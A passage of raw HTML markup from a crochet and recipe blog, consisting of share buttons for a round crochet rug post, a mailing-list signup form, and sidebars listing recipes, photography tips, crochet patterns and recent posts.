rel=nofollow ><span class="essb_icon essb_icon_viber"></span><span class=essb_network_name>Viber</span></a></li><li class="essb_item essb_link_telegram nolightbox"> <a href="tg://msg?text=How%20To%20Make%20A%20Simple%20Round%20Crochet%20Rug%20http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F" title onclick="essb.tracking_only('', 'telegram', '587041724', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_telegram"></span><span class=essb_network_name>Telegram</span></a></li><li class="essb_item essb_link_subscribe nolightbox"> <a href=# title onclick="essb.toggle_subscribe('587041724'); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_subscribe"></span><span class=essb_network_name>Subscribe</span></a></li><li class="essb_item essb_link_skype nolightbox"> <a href="https://web.skype.com/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;https://web.skype.com/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;skype&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_skype"></span><span class=essb_network_name>Skype</span></a></li><li class="essb_item essb_link_messenger nolightbox"> <a href="https://www.facebook.com/dialog/send?app_id=&link=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&redirect_uri=https://facebook.com" title onclick="essb.window(&#39;https://www.facebook.com/dialog/send?app_id=&link=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&redirect_uri=https://facebook.com&#39;,&#39;messenger&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_messenger"></span><span class=essb_network_name>Facebook Messenger</span></a></li><li class="essb_item essb_link_kakaotalk nolightbox"> <a href="https://story.kakao.com/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;https://story.kakao.com/share?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;kakaotalk&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_kakaotalk"></span><span class=essb_network_name>Kakao</span></a></li><li class="essb_item essb_link_livejournal nolightbox"> <a href="http://www.livejournal.com/update.bml?subject=How To Make A Simple Round Crochet Rug&event=%3Ca+href%3D%22http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F%22%3EHow+To+Make+A+Simple+Round+Crochet+Rug%3C%2Fa%3E" title onclick="essb.window(&#39;http://www.livejournal.com/update.bml?subject=How To Make A Simple Round Crochet Rug&event=%3Ca+href%3D%22http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F%22%3EHow+To+Make+A+Simple+Round+Crochet+Rug%3C%2Fa%3E&#39;,&#39;livejournal&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_livejournal"></span><span class=essb_network_name>LiveJournal</span></a></li><li class="essb_item essb_link_yammer nolightbox"> <a href="https://www.yammer.com/messages/new?login=true&amp;trk_event=yammer_share&amp;status=How%20To%20Make%20A%20Simple%20Round%20Crochet%20Rug http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F" title onclick="essb.window(&#39;https://www.yammer.com/messages/new?login=true&amp;trk_event=yammer_share&amp;status=How%20To%20Make%20A%20Simple%20Round%20Crochet%20Rug http%3A%2F%2Fzoomyummy.com%2F2017%2F08%2F24%2Fmake-simple-round-crochet-rug%2F&#39;,&#39;yammer&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yammer"></span><span class=essb_network_name>Yammer</span></a></li><li class="essb_item essb_link_meetedgar nolightbox"> <a href="javascript:(function()%7B!function()%7Bvar e%3Ddocument.getElementsByTagName(&quot;head&quot;)%5B0%5D,t%3Ddocument.createElement(&quot;script&quot;)%3Bt.type%3D&quot;text/javascript&quot;,t.src%3D&quot;//app.meetedgar.com/share.js%3F&quot;%2BMath.floor(99999*Math.random()),e.appendChild(t)%7D()%7D)()%3B" title onclick="essb.tracking_only('', 'meetedgar', '587041724', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_meetedgar"></span><span class=essb_network_name>Edgar</span></a></li><li class="essb_item essb_link_fintel nolightbox"> <a href="https://fintel.io/submit?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;https://fintel.io/submit?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;fintel&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_fintel"></span><span class=essb_network_name>Fintel</span></a></li><li class="essb_item essb_link_mix nolightbox"> <a href="https://mix.com/extension/add?source=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/" title onclick="essb.window(&#39;https://mix.com/extension/add?source=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&#39;,&#39;mix&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mix"></span><span class=essb_network_name>Mix</span></a></li><li class="essb_item essb_link_instapaper nolightbox"> <a href="https://www.instapaper.com/hello2?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&description=" title onclick="essb.window(&#39;https://www.instapaper.com/hello2?url=http://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/&title=How+To+Make+A+Simple+Round+Crochet+Rug&description=&#39;,&#39;instapaper&#39;,&#39;587041724&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_instapaper"></span><span class=essb_network_name>Instapaper</span></a></li></ul></div></div></div><div class="essb_morepopup_shadow essb_morepopup_shadow_1877893649" onclick="essb.toggle_less_popup('1877893649'); return false;"></div><div class="essb-subscribe-form essb-subscribe-form-587041724 essb-subscribe-form-popup" data-popup=1 style="display: none;"><div class="essb-subscribe-form-content essb-subscribe-from-design1" data-position=sharebuttons-more data-design=design1><h4 class="essb-subscribe-form-content-title">Join our list</h4><p class=essb-subscribe-form-content-text>Subscribe to our mailing list and get interesting stuff and updates to your email inbox.</p><form action="https://zoomyummy.com?essb3_subscribe_nonce=771d655b92&essb-malchimp-signup=1" method=post class=essb-subscribe-from-content-form id=essb-subscribe-from-content-form-mailchimp><input class=essb-subscribe-form-content-email-field type=text value placeholder="Enter your email here" name=mailchimp_email><input class=submit name=submit type=submit value="Sign Up Now" onclick="essb.ajax_subscribe('587041724', event);"></form><div class=essb-subscribe-loader> <svg version=1.1 id=loader-1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink x=0px y=0px width=40px height=40px viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space=preserve> <path fill=#000 d=M43.935,25.145c0-10.318-8.364-18.683-18.683-18.683c-10.318,0-18.683,8.365-18.683,18.683h4.068c0-8.071,6.543-14.615,14.615-14.615c8.072,0,14.615,6.543,14.615,14.615H43.935z> <animateTransform attributeType="xml" attributeName="transform" type="rotate" from="0 25 25" to="360 25 25" dur="0.6s" repeatCount="indefinite"/> </path> </svg></div><p class="essb-subscribe-form-content-success essb-subscribe-form-result-message">Thank you for subscribing.</p><p class="essb-subscribe-form-content-error essb-subscribe-form-result-message">Something went wrong.</p><div class=clear></div><p class=essb-subscribe-form-content-footer>We respect your privacy and take protecting it seriously</p></div><button type=button class=essb-subscribe-form-close onclick="essb.subscribe_popup_close('587041724');">x</button></div><div class="essb-subscribe-form-overlay essb-subscribe-form-overlay-587041724" onclick="essb.subscribe_popup_close('587041724');"></div></div><footer class=entry-meta> <span class=cat-links><span class=screen-reader-text>Categories </span><a href=https://zoomyummy.com/category/crochet/ rel="category tag">crochet</a>, <a href=https://zoomyummy.com/category/random-joy/rug/ rel="category tag">rug</a></span><span class=tags-links><span class=screen-reader-text>Tags </span><a href=https://zoomyummy.com/tag/crochet/ rel="nofollow tag">crochet</a>, <a href=https://zoomyummy.com/tag/rug/ rel="nofollow tag">rug</a></span><span class=comments-link><a href=https://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/#comments rel=nofollow>2 Comments</a></span></footer></div></article><div style="display:inline-block; width:100%; background-color:#fff; padding-top:20px; margin-bottom:-20px;"><div class=nav-next style=padding-right:30px;><a href=https://zoomyummy.com/page/2/ >Next page <span class=meta-nav>&rarr;</span></a></div><div class=nav-previous style=padding-left:30px;></div></div><div class=wp-pagenavi role=navigation> <span class=pages>Go to page:</span><span aria-current=page class=current>1</span><a class="page larger" title="Page 2" href=https://zoomyummy.com/page/2/>2</a><a class="page larger" title="Page 3" href=https://zoomyummy.com/page/3/>3</a><a class="page larger" title="Page 4" href=https://zoomyummy.com/page/4/>4</a><a class="page larger" title="Page 5" href=https://zoomyummy.com/page/5/>5</a><span class=extend>...</span><a class="larger page" title="Page 20" href=https://zoomyummy.com/page/20/>20</a><a class="larger page" title="Page 40" href=https://zoomyummy.com/page/40/>40</a><span class=extend>...</span><a class=last href=https://zoomyummy.com/page/181/>181</a></div></main></div><div id=left-sidebar itemtype=http://schema.org/WPSideBar itemscope=itemscope role=complementary class="widget-area grid-20 tablet-grid-20 grid-parent sidebar pull-60 tablet-pull-60"><div class=inside-left-sidebar><aside id=text-2 class="widget inner-padding widget_text"><div class=textwidget>&nbsp;<p class=center> <script async src=//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js></script> <ins class=adsbygoogle style=display:inline-block;width:160px;height:600px data-ad-client=ca-pub-5571995028593943 data-ad-slot=6195648484></ins> <script>(adsbygoogle=window.adsbygoogle||[]).push({});</script> </p></div></aside><aside id=text-3 class="widget inner-padding widget_text"><h4 class="widget-title">Top Recipes</h4><div class=textwidget><p class=center> <a href=https://zoomyummy.com/2012/08/04/2-minute-chocolate-chip-cookie-for-one/><img src=https://zoomyummy.com/wp-content/uploads/sidebars/2-minute-microwave-chocholate-chip-cookie-for-one1.jpg alt="2-Minute Microwave Chocolate Chip Cookie Recipe For One" title="2-Minute Microwave Chocolate Chip Cookie Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>2-Minute Microwave<br>Chocolate Chip Cookie</p><p class=center> <a href=https://zoomyummy.com/2011/10/14/scalloped-hasselback-potatoes/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/scalloped-hasselback-potatoes-recipe-160x107.jpg alt="Scalloped Hasselback Potatoes Recipe" title="Scalloped Hasselback Potatoes Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Scalloped<br>Hasselback Potatoes</p><p class=center> <a href=https://zoomyummy.com/2013/02/25/awesome-peach-and-cinnamon-muffins/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/awesome-peach-and-cinnamon-muffins-160x107.jpg alt="Awesome Peach And Cinnamon Muffins Recipe" title="Awesome Peach And Cinnamon Muffins Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Awesome<br>Peach and Cinnamon<br>Muffins</p><p class=center> <a href=https://zoomyummy.com/2011/07/23/cinnamon-sugar-pull-apart-bread/><img src=https://zoomyummy.com/wp-content/uploads/sidebars/cinnamon-sugar-pull-apart-bread-recipe-160.jpg alt="Cinnamon Sugar Pull-Apart Bread Recipe" title="Cinnamon Sugar Pull-Apart Bread Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Cinnamon Sugar<br>Pull-Apart Bread</p><p class=center> <a href=https://zoomyummy.com/2011/01/13/detox-smoothie/><img src=https://zoomyummy.com/wp-content/uploads/sidebars/detox-smoothe-160.jpg alt="Detox Smoothie Recipe" title="Detox Smoothie Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Detox Smoothie</p><p class=center> <a href=https://zoomyummy.com/2012/03/04/chocolate-pancake-cake/><img src=https://zoomyummy.com/wp-content/uploads/sidebars/chocolate-pancake-cake-recipe.jpg alt="Chocolate Pancake Cake Recipe" title="Chocolate Pancake Cake Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Chocolate Pancake Cake</p><p class=center> <a href=https://zoomyummy.com/2010/03/27/mini-apple-pies/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/mini-apple-pies-160x107.jpg alt="Mini Apple Pies Recipe" title="Mini Apple Pies Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Mini Apple Pies</p><p class=center> <a href=https://zoomyummy.com/2011/08/03/fried-ice-cream/><img src=https://zoomyummy.com/wp-content/uploads/sidebars/fried-ice-cream-recipe-160.jpg alt="Fried Ice Cream Recipe" title="Fried Ice Cream Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Fried Ice Cream</p><p class=center> <a href=https://zoomyummy.com/2011/09/05/caramel-apple-cheesecake-cookie-bars/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/caramel-apple-cheesecake-cookie-bars-160x107.jpg alt="Caramel Apple Cheesecake Cookie Bars Recipe" title="Caramel Apple Cheesecake Cookie Bars Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Caramel Apple Cheesecake<br>Cookie Bars</p><p class=center> <a href=https://zoomyummy.com/2010/09/02/crepes-with-cream-cheese-filling/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/crepes-with-cream-cheese-filling-160x107.jpg alt="Crepes with Cream Cheese Filling Recipe" title="Crepes with Cream Cheese Filling Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Crepes With Cream<br>Cheese Filling</p><p class=center> <a href=https://zoomyummy.com/2011/09/17/oven-fried-onion-rings/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/oven-fried-onion-rings-160x107.jpg alt="Oven-Fried Onion Rings Recipe" title="Oven-Fried Onion Rings Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Oven-Fried Onion Rings</p><p class=center> <a href=https://zoomyummy.com/2011/02/05/molten-lava-cakes/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/molten-lava-cakes-160.jpg alt="molten lava cakes recipe" title="Molten Lava Cakes Recipe" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Molten Lava Cakes</p><p class=center> <a href=https://zoomyummy.com/all-recipes/ class=allrecipes>All Recipes</a></p></div></aside><aside id=text-4 class="widget inner-padding widget_text"><h4 class="widget-title">Photography Tips</h4><div class=textwidget><p class=center> <a href=https://zoomyummy.com/2010/07/28/gosh-whats-aperture/><img src=https://zoomyummy.com/wp-content/uploads/sidebars/3-gosh-what-is-aperture-160-px.jpg alt="Explanation of Aperture with Picture Tutorial" title="Gosh, What Is Aperture?" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Gosh, What Is Aperture?</p><p class=center> <a href=https://zoomyummy.com/2010/12/13/burning-the-haze-my-most-favorite-photoshop-trick/><img src=https://zoomyummy.com/wp-content/uploads/sidebars/my-favorite-photoshop-technique-160px1.jpg alt="Photoshop Technique to Add Contrast to Images" title="My Favorite Photoshop Trick" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>My Favorite<br>Photoshop Trick</p><p class=center> <a href=https://zoomyummy.com/2010/06/28/how-to-kill-the-shadow-in-photography/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/how-to-kill-the-shadow-160x107.jpg alt="How to Kill the Shadow in Photography" title="How to Kill the Shadow (… in Photography)" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>How to Kill the Shadow<br>(...in Photography)</p><p class=center> <a href=https://zoomyummy.com/2010/10/12/my-camera-journey-so-far/><img src=https://zoomyummy.com/wp-content/uploads/sidebars/1-my-camera-journey-160-px.jpg alt="My Camera Journey" title="My Camera Journey" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>My Camera Journey</p><p class=center> <a href=https://zoomyummy.com/2013/04/12/photography-photo-editing-with-rad-lab/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/tulip-totally-rad-presets-before-and-after-comparison-160x107.jpg alt="Photo Editing with RadLab" title="Photo Editing with RadLab" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Photo Editing<br>With RadLab</p><p class=center> <a href=https://zoomyummy.com/2010/11/13/how-to-remove-crumbs-from-your-pictures/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/how-to-remove-crumbs-160x107.jpg alt="How to Remove Crumbs (…From Your Pictures)" title="How to Remove Crumbs (…From Your Pictures)" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>How to Remove Crumbs<br>(...From Your Pictures)</p><p class=center> <a href=https://zoomyummy.com/2010/11/05/my-lenses/><img src=https://zoomyummy.com/wp-content/uploads/sidebars/2-lenses-I-use-160-px.jpg alt="Camera Lenses I Use" title="Lenses I Use" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Lenses I Use</p><p class=center> <a href=https://zoomyummy.com/2011/08/09/photography-adjusting-exposure-with-levels/><img src=https://zoomyummy.com/wp-content/uploads/2014/03/correcting-exposure-with-levels-160x107.jpg alt="Adjusting Exposure With Levels" title="Adjusting Exposure With Levels" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Adjusting Exposure<br>With Levels</p></div></aside><aside id=text-5 class="widget inner-padding widget_text"><h4 class="widget-title"> My Crochet       Pattern Shop</h4><div class=textwidget><p class=center> <a href=https://zoomyummy.com/etsy/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2014/06/mosaic-for-sidebar3.jpg alt="crochet pattern shop ZoomYummy" width=160 height=644 class="aligncenter size-full wp-image-30069"></a></p></div></aside></div></div><div id=right-sidebar itemtype=http://schema.org/WPSideBar itemscope=itemscope role=complementary class="widget-area grid-20 tablet-grid-20 grid-parent sidebar"><div class=inside-right-sidebar><aside id=text-7 class="widget inner-padding widget_text"><h4 class="widget-title">Recent Posts</h4><div class=textwidget><p class=center><a href=../2017/12/23/merry-christmas-7/><img class="aligncenter size-full wp-image-55234" src=../wp-content/uploads/2017/12/christmas-160.jpg alt width=160 height=108></a></p><p class=center style="margin-top: -10px;">Merry Christmas!</p><p class=center><a href=https://zoomyummy.com/2017/12/05/crochet-snowman/><img class="aligncenter size-full wp-image-55183" src=https://zoomyummy.com/wp-content/uploads/2017/09/crochet-snowman-160.jpg alt="crochet snowman" width=160 height=108></a></p><p class=center style="margin-top: -10px;">Crochet Snowman</p><p class=center><a href=https://zoomyummy.com/2017/09/10/aaaand-painting-furniture-chalk-paint/><img class="aligncenter size-full wp-image-54644" src=https://zoomyummy.com/wp-content/uploads/2017/08/blue-tv-table-160.jpg alt="painting furniture with chalk paint" width=160 height=107></a></p><p class=center style="margin-top: -10px;">And I Did It Again (&hellip; Painting Furniture With Chalk Paint)</p><p class=center><a href=https://zoomyummy.com/2017/08/24/make-simple-round-crochet-rug/><img class="aligncenter size-full wp-image-54550" src=https://zoomyummy.com/wp-content/uploads/2017/08/round-crochet-carpet-160-2.jpg alt="how to make a round crochet rug" width=160 height=107></a></p><p class=center style="margin-top: -10px;">How To Make Simple Round Crochet Rug</p><p class=center><a href=https://zoomyummy.com/2017/08/02/painting-furniture-with-chalk-paint/><img class="aligncenter size-full wp-image-54474" src=https://zoomyummy.com/wp-content/uploads/2017/07/chalk-paint-160.jpg alt="painting furniture with chalk paint" width=160 height=107></a></p><p class=center style="margin-top: -10px;">Painting Furniture With Chalk Paint</p><p class=center><a href=https://zoomyummy.com/2017/07/22/dressing-airbed-k-project-happiness-overload/><img class="aligncenter size-full wp-image-54406" src=https://zoomyummy.com/wp-content/uploads/2017/07/dressing-an-airbed-160.jpg alt="crochet bed cover and crochet cushions" width=160 height=107></a></p><p class=center style="margin-top: -10px;">Dressing An Airbed</p><p class=center><a class=luckygirl href="../index.php?random=1">Surprise Me!</a></p></div></aside><aside id=text-6 class="widget inner-padding widget_text"><h4 class="widget-title">Welcome</h4><div class=textwidget><p class=center> <a href=https://zoomyummy.com/about/ rel="attachment wp-att-48556"><img src=https://zoomyummy.com/wp-content/uploads/2016/12/aura-2-160.jpg alt="petra frohlich" width=160 height=240 class="aligncenter size-full wp-image-53243"></a><p class=center style=margin-top:-10px;>Hi! I am Petra. <br> I'm happy to see you here! <br>Enjoy! ♡</p></div></aside><aside id=text-8 class="widget inner-padding widget_text"><h4 class="widget-title">Stay In Touch</h4><div class=textwidget><p class="opac70 center"><a href=https://zoomyummy.com/etsy/ target=_blank rel="noopener noreferrer"> <img src=https://zoomyummy.com/wp-content/uploads/2013/07/ex.png width=30 height=30 alt="Etsy Crochet PDF Patterns Shop" title="Etsy Shop"></a><a href=https://zoomyummy.com/facebook/ target=_blank rel="noopener noreferrer"> <img src=https://zoomyummy.com/wp-content/uploads/2013/07/fx.png width=30 height=30 alt=Facebook title=Facebook></a><a href=https://zoomyummy.com/pinterest/ target=_blank rel="noopener noreferrer"> <img src=https://zoomyummy.com/wp-content/uploads/2013/07/px.png width=30 height=30 alt=Pinterest title=Pinterest></a><a href=https://zoomyummy.com/twitter/ target=_blank rel="noopener noreferrer"> <img src=https://zoomyummy.com/wp-content/uploads/2013/07/tx.png width=30 height=30 alt=Twitter title=Twitter></a><a href=https://zoomyummy.com/youtube/ target=_blank rel="noopener noreferrer"> <img src=https://zoomyummy.com/wp-content/uploads/2013/12/ux.png width=30 height=30 alt=YouTube title=YouTube></a><a href=https://feeds.feedburner.com/zoomyummy/ target=_blank rel="noopener noreferrer"> <img src=https://zoomyummy.com/wp-content/uploads/2013/07/rx.png width=30 height=30 alt="RSS Feed" title="RSS Feed"></a></p></div></aside><aside id=text-9 class="widget inner-padding widget_text"><div class=textwidget>&nbsp;<p class=center> <script async src=//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js></script> <ins class=adsbygoogle style=display:inline-block;width:160px;height:600px data-ad-client=ca-pub-5571995028593943 data-ad-slot=1376999281></ins> <script>(adsbygoogle=window.adsbygoogle||[]).push({});</script> </p></div></aside><aside id=feedburneremailwidget-2 class="widget inner-padding FeedburnerEmailWidget"><h4 class="widget-title">Email Subscription</h4><form id=feedburner_email_widget_sbef action=https://feedburner.google.com/fb/a/mailverify method=post onsubmit="window.open('https://feedburner.google.com/fb/a/mailverify?uri=zoomyummy', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true;" target=popupwindow><label><p style="text-align: center; font-size: 13px;">Enter your email address to subscribe to this blog and receive notifications of new posts by email.</p></label><input id=feedburner_email_widget_sbef_email name=email type=text><input type=hidden value=zoomyummy name=uri><input type=hidden value=en_US name=loc><input id=feedburner_email_widget_sbef_submit type=submit value="Sign me up!"></form></aside><aside id=text-10 class="widget inner-padding widget_text"><h4 class="widget-title">Most Popular Patterns</h4><div class=textwidget><p class=center> <a href=https://zoomyummy.com/little-colorful-christmas-trees/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2013/06/9.jpg title="Little Colorful Christmas Trees Crochet Pattern" alt="Little Colorful Christmas Trees Crochet Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Colorful Christmas Trees<br>Crochet Pattern</p><p class=center> <a href=https://zoomyummy.com/christmas-crochet-pattern-megapack/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2014/10/megapack-160.jpg alt="Christmas Crochet Pattern Megapack" title="Christmas Crochet Pattern Megapack" width=160 height=84 class="aligncenter size-full wp-image-31806"></a></p><p class=center style=margin-top:-10px;>Christmas Crochet Pattern<br>MEGAPACK</p><p class=center> <a href=https://zoomyummy.com/crochet-christmas-stocking-ornaments/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2013/06/4.jpg title="Crochet Christmas Stockings Pattern" alt="crochet Christmas stockings pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Crochet Christmas Stockings<br>Pattern</p><p class=center> <a href=https://zoomyummy.com/big-flower-party/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2013/06/1.jpg title="Big Flower Party Pattern" alt="Big Crochet Flower Party Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Big Flower Party<br>Crochet Pattern</p><p class=center> <a href=https://zoomyummy.com/crochet-owl-coasters/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2014/08/crochet-owl-coaster-160.jpg title="Crochet Owl Coasters Pattern" alt="Crochet Owl Coasters Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Crochet Owl Coasters<br>Pattern</p><p class=center> <a href=https://zoomyummy.com/2011/01/21/how-to-make-simple-crochet-slippers/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2013/06/3.jpg title="Crochet Slippers Free Pattern" alt="Crochet Slippers Free Pattern" width=160 height=107 class="aligncenter size-full wp-image-30050"></a></p><p class=center style=margin-top:-10px;>Crochet Slippers<br>Free Pattern</p><p class=center> <a href=https://zoomyummy.com/crochet-3d-flower-baby-blanket/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2013/06/2.jpg title="Crochet 3D Flower Baby Blanket Pattern" alt="Crochet 3D Flower Baby Blanket Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>3D Flower Baby Blanket<br>Crochet Pattern</p><p class=center> <a href=https://zoomyummy.com/pick-any-5-crochet-patterns-bundle/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2013/06/5V.jpg title="Pick Any 5 Crochet Patterns" alt="Pick Any 5 Crochet Patterns" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Pick Any 5<br>Crochet Patterns</p><p class=center> <a href=https://zoomyummy.com/colorful-christmas-star-ball/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2014/03/colorful-christmas-star-ball-160x107.jpg title="Colorful Christmas Star Ball Pattern" alt="Colorful Christmas Star Ball Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Colorful Christmas Star Ball<br>Crochet Pattern</p><p class=center> <a href=https://zoomyummy.com/crochet-owl-cushion-with-colorful-feathers/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2013/09/6-crochet-owl-cushion-with-colorful-feathers.jpg title="Crochet Owl Cushion With Colorful Feathers Pattern" alt="Crochet Owl Cushion With Colorful Feathers Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Owl Cushion<br>With Colorful Feathers<br>Crochet Pattern</p><p class=center> <a href=https://zoomyummy.com/crochet-christmas-ornaments/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2014/11/Crochet-Christmas-Ornaments-160x107.jpg title="Crochet Christmas Ornaments Pattern" alt="Crochet Christmas Ornaments Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Christmas Ornaments<br>Crochet Pattern</p><p class=center> <a href=https://zoomyummy.com/joy-joy-coasters/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2013/09/1-crochet-joy-joy-coasters.jpg title="Crochet Joy-Joy Coasters Pattern" alt="Crochet Joy-Joy Coasters Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Crochet Joy-Joy Coasters<br>Pattern</p><p class=center> <a href=https://zoomyummy.com/crochet-christmas-bells/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2014/11/Crochet-Christmas-Bells-160x107.jpg title="Crochet Christmas Bells Pattern" alt="Crochet Christmas Bells Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Crochet Christmas Bells<br>Pattern</p><p class=center> <a href=https://zoomyummy.com/chunky-joy-joy-scarf/ target=_blank rel="noopener noreferrer"><img src=https://zoomyummy.com/wp-content/uploads/2013/09/chunky-joy-joy-scarf-160-px.jpg title="Chunky Joy-Joy Scarf Pattern" alt="Chunky Joy-Joy Scarf Pattern" width=160 height=107 class="aligncenter size-full"></a></p><p class=center style=margin-top:-10px;>Chunky Joy-Joy Scarf<br>Crochet Pattern</p><p class=center> <a href=https://zoomyummy.com/shop/ target=_blank class=patterngirl rel="noopener noreferrer">More Patterns</a></p></div></aside><aside id=recent-comments-with-gravatar class="widget inner-padding recent_comments_gravatar_widget"><h4 class="widget-title">Recent Comments</h4><div class=rcg-div><ul><li ><div class=rcg-wrapper><div class=rcg-avatar><span title=Alex><img alt src='https://secure.gravatar.com/avatar/a184e5db0e8384acadef8bd729ddb4aa?s=46&#038;d=monsterid&#038;r=g' srcset='https://secure.gravatar.com/avatar/a184e5db0e8384acadef8bd729ddb4aa?s=92&#038;d=monsterid&#038;r=g 2x' class='avatar avatar-46 photo' height=46 width=46></span></div><div class=rcg-text style=padding-left:56px>Alex commented on <a href=https://zoomyummy.com/2017/02/03/easiest-knit-pullover-made-one-piece/#comment-1382034 title="Alex | The Easiest Knit Pullover (Made In One Piece)">The Easiest Knit Pullover (Made In One Piece)</a><br> (6 weeks ago)</div></div></li><li ><div class=rcg-wrapper><div class=rcg-avatar><span title=Jo><img alt 